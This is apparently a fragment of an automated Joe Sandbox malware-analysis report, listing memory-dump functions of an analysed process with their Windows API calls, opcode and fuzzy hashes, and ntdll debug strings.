                                                                                                • Instruction Fuzzy Hash: 7C0149B581414DABDB11CFA8EC45BDEBBB4DF86654F00C6D8E5156B143E230D50ACB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A3F50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027A3FC2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: e664350d3b18a872910a2329561922eb13d4743b4bf9a0e59bc9062858898256
                                                                                                • Instruction ID: 561c663d08a0a3f6c39167a50ba02979ed770e8c0352520cb38dcb363a209a3d
                                                                                                • Opcode Fuzzy Hash: e664350d3b18a872910a2329561922eb13d4743b4bf9a0e59bc9062858898256
                                                                                                • Instruction Fuzzy Hash: B4011EB6D4020DBBDF11EAA4DC55FDDB7799F55308F004695A90897240F631E718CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7F40 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,027A7843,00000010,?,?,?,00000044,?,00000010,027A7843,?,?,?), ref: 027B7FA3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateInternalProcess
                                                                                                • String ID:
                                                                                                • API String ID: 2186235152-0
                                                                                                • Opcode ID: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction ID: d577f57ba89a2c9c2d69092f6f3e4f2fb5f46e9cf956a3df34e0146e22046513
                                                                                                • Opcode Fuzzy Hash: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction Fuzzy Hash: 0101C4B6214609BFCB04DF99DC90EEB77ADAF8C754F408108BA09D3240D630F8518BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02799350 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02799395
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: d890c0683fcb36cdd013a7daa9d4c0ca35221b5dd203bebbfe8f0b18f9f39f72
                                                                                                • Instruction ID: 13c33bdcddfe4a019cd8122c93bd9cb7a0c81f97d02991f99dd1a0fabbbb0d80
                                                                                                • Opcode Fuzzy Hash: d890c0683fcb36cdd013a7daa9d4c0ca35221b5dd203bebbfe8f0b18f9f39f72
                                                                                                • Instruction Fuzzy Hash: CFF09B7334030436E73165A9AC02FD7B79CDF85765F540425FB0CEB1C0D996B44146E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02799349 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02799395
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: e64ded53fec47460a4eb018d81707beaf207cc6191c98fd2931ed662afb1bde5
                                                                                                • Instruction ID: 8212a8249326d04ac937e83cdb166ca2f9515544b1fe977b7badb7ce113f6a37
                                                                                                • Opcode Fuzzy Hash: e64ded53fec47460a4eb018d81707beaf207cc6191c98fd2931ed662afb1bde5
                                                                                                • Instruction Fuzzy Hash: E1F0E5732403143AE63266999C02FD7729CDF84B54F550018FA0CEB1C0DEA2B8418AE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7E60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(027A1169,?,027B4579,027A1169,027B41C7,027B4579,?,027A1169,027B41C7,00001000,?,?,027B9733), ref: 027B7E9F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction ID: cf8c175eec1c32d7e1dcef85261eb608c62eb7dece74a06b0769ae37bb3f81eb
                                                                                                • Opcode Fuzzy Hash: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction Fuzzy Hash: 17E065B2200205BFCA10EE98DC44FAB33ADEF89750F00841AF908A7241DA30B9118AB6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7EB0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8C0F10F9,00000007,00000000,00000004,00000000,027A3832,000000F4,?,?,?,?,?), ref: 027B7EEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction ID: ca234a6f48c1332a5e1f87004c7bf410c4bd087289d8864d8e4099e3c29cddb6
                                                                                                • Opcode Fuzzy Hash: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction Fuzzy Hash: 74E065B62042047FCA11EE58EC44FEB73ADEF89750F004409F90CA7240C670BA108AB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A7880 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 027A78AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: c37f2e32777f3ad8c0d672fff3fc477ed4a62bc264b9371ff7a1276157a9807a
                                                                                                • Instruction ID: 53a1bd9d7f9efaee71ab45949df8c783e01bd34730ad7d5ebd6e74216e4a05a5
                                                                                                • Opcode Fuzzy Hash: c37f2e32777f3ad8c0d672fff3fc477ed4a62bc264b9371ff7a1276157a9807a
                                                                                                • Instruction Fuzzy Hash: B0E048716402041AFA2855689C56FBE33589BC4778F544660B95C9B2C1E775F54181A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027A7690 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,027A1460,027B68E7,027B41C7,?), ref: 027A76C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 481f3ae30dbfaced3432f297a36555c701d5d7eb88aa6cfaa4b6e8dc219bd39c
                                                                                                • Instruction ID: 84bf798875a3be3b9189be07db815c8abbe1233d411ff10f25224df289fde93e
                                                                                                • Opcode Fuzzy Hash: 481f3ae30dbfaced3432f297a36555c701d5d7eb88aa6cfaa4b6e8dc219bd39c
                                                                                                • Instruction Fuzzy Hash: 29D05E712803043BFA05E6B9DC0AFAA328D9B48758F554474B94CD72C2EE65F05146A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: f174cab8149fb78a90889b62643df5f6b0e989fae517b2dbb063409125fca765
                                                                                                • Instruction ID: a9c667c0263504229e151951ffce2e0b8efcba6de5081dc9490290056d173bda
                                                                                                • Opcode Fuzzy Hash: f174cab8149fb78a90889b62643df5f6b0e989fae517b2dbb063409125fca765
                                                                                                • Instruction Fuzzy Hash: BEB09B719015C5C9FF11F7614A087177914ABD1705F15C561D3038641E4738D1D5E176
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 048E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: d27ab3e0eab18995f89fc47b08cd286210ffd48e1f85a80ec8826f0bb99cfc23
                                                                                                • Instruction ID: ad0059ea7b63f5be246ffd382db373f8c5a37ba41b278bb84ba2470ac5625b78
                                                                                                • Opcode Fuzzy Hash: d27ab3e0eab18995f89fc47b08cd286210ffd48e1f85a80ec8826f0bb99cfc23
                                                                                                • Instruction Fuzzy Hash: 085129B6A0011ABFDB11EF998C9097EF7BCBB092047148B69E5A5D3641D374FE0097A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04952410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: c3f427165b469a6d825bef03e9a9c84c65494cd2c3a543c78955d23953ed8d16
                                                                                                • Instruction ID: a36cfc4f439e77b7fe28cf676075e6dd47545b7207b24bd109ee49fb549fa43f
                                                                                                • Opcode Fuzzy Hash: c3f427165b469a6d825bef03e9a9c84c65494cd2c3a543c78955d23953ed8d16
                                                                                                • Instruction Fuzzy Hash: E051F375B00645AFDB20DF5CCC9097EB7FDAB48204B2488B9E996D7651E6B4FA008F60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Execute=1, xrefs: 04914713
                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04914787
                                                                                                • ExecuteOptions, xrefs: 049146A0
                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04914655
                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049146FC
                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04914742
                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04914725
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                • API String ID: 0-484625025
                                                                                                • Opcode ID: 681972d95d6b2444ff71f28785c05b90f9274f8cc83be3bc7916074b53b86c57
                                                                                                • Instruction ID: c29b5d67d4d0dc8e7af814df38dc7c3ace1405fe6eae184e9c7c129488594a08
                                                                                                • Opcode Fuzzy Hash: 681972d95d6b2444ff71f28785c05b90f9274f8cc83be3bc7916074b53b86c57
                                                                                                • Instruction Fuzzy Hash: EA51F83160121D7AEB10BAA9EC85FA977B8EF49704F140AA9E505E7190FB70BE41CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04976940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                • Instruction ID: a6e603303c9f8d3f4fda6e49a0bf15f192907e83ea8eafccdb83366418431f0b
                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                • Instruction Fuzzy Hash: 1C022371608741AFD304CF18C894A6FBBE9EFC8714F448A2DF9899B264DB71E905CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction ID: 1d07e704547b5c3cad730d046f3170d29114deea7bffdd2db6571f1046d5c8ec
                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction Fuzzy Hash: F681DF70E052598FEF28CE6AC8917BEBBA1AF47354F184B1AD861E7690D730B841CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 049520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$[$]:%u
                                                                                                • API String ID: 48624451-2819853543
                                                                                                • Opcode ID: bb6e9cb6fcefc810f6c4285216ef5b8c964c53dae0e50cd4528c2e2f7e811b1b
                                                                                                • Instruction ID: eb744288e6a797598babeb1dec84984732ef4a73134af70e4a056d3648cf1b22
                                                                                                • Opcode Fuzzy Hash: bb6e9cb6fcefc810f6c4285216ef5b8c964c53dae0e50cd4528c2e2f7e811b1b
                                                                                                • Instruction Fuzzy Hash: FA215176A00119ABDB10EFA9DC40EBFBBECEF58644F140566ED05E3200E770E9018FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049102E7
                                                                                                • RTL: Re-Waiting, xrefs: 0491031E
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049102BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                • API String ID: 0-2474120054
                                                                                                • Opcode ID: 5ec7a1c3a5889e6783287129873898cc516fc63a4e1a1c410a35e3114098b9e6
                                                                                                • Instruction ID: f0e9c5978c1677a8e42158a7472ef2faa18f63d4977e5301e034155f16349691
                                                                                                • Opcode Fuzzy Hash: 5ec7a1c3a5889e6783287129873898cc516fc63a4e1a1c410a35e3114098b9e6
                                                                                                • Instruction Fuzzy Hash: BAE1BD306047459FE725CF28C884B2AB7E5AB89318F140B2DF6A5CB6E0E775F845CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RTL: Resource at %p, xrefs: 04917B8E
                                                                                                • RTL: Re-Waiting, xrefs: 04917BAC
                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04917B7F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 0-871070163
                                                                                                • Opcode ID: affa68330f35420f2bf8d88b4eba9564b77e6ea43e35c58ba04b920de04827fa
                                                                                                • Instruction ID: 2d5ffeff85d27166df733be7ce9a7353e3a48a05793cc4a2f9488c8581714ce7
                                                                                                • Opcode Fuzzy Hash: affa68330f35420f2bf8d88b4eba9564b77e6ea43e35c58ba04b920de04827fa
                                                                                                • Instruction Fuzzy Hash: A241E0317027069FDB24DE29C840B6AB7E5EF89724F100F2DE85ADB690DB70F8058B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0491728C
                                                                                                Strings
                                                                                                • RTL: Resource at %p, xrefs: 049172A3
                                                                                                • RTL: Re-Waiting, xrefs: 049172C1
                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04917294
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 885266447-605551621
                                                                                                • Opcode ID: 7c223e9e480d14b15d2dcd5b9ed914eea41595792d09787d7519b8a5569fdcfc
                                                                                                • Instruction ID: 25595591d30988cf57acf12aa2a72ec65c125c370c81dc5e43f4e6e417399477
                                                                                                • Opcode Fuzzy Hash: 7c223e9e480d14b15d2dcd5b9ed914eea41595792d09787d7519b8a5569fdcfc
                                                                                                • Instruction Fuzzy Hash: 8041EF3170120AABE720DE65CC41F66B7A5FB85728F100A29F955EB240EB21F842DBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04952300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$]:%u
                                                                                                • API String ID: 48624451-3050659472
                                                                                                • Opcode ID: 60aa0c0cb6f068923cf14ea285096cd2fe5612d398911f57a5c0ec8e8a60065b
                                                                                                • Instruction ID: 48b79261f95934716676265fbd77a5e5c3a1a75eac81e7d7e5ceefc453a7c6fa
                                                                                                • Opcode Fuzzy Hash: 60aa0c0cb6f068923cf14ea285096cd2fe5612d398911f57a5c0ec8e8a60065b
                                                                                                • Instruction Fuzzy Hash: 2C315472A006199FDB20DF29DC40BEE77FCEB44A14F5445A5EC49E3240EB30BA499FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
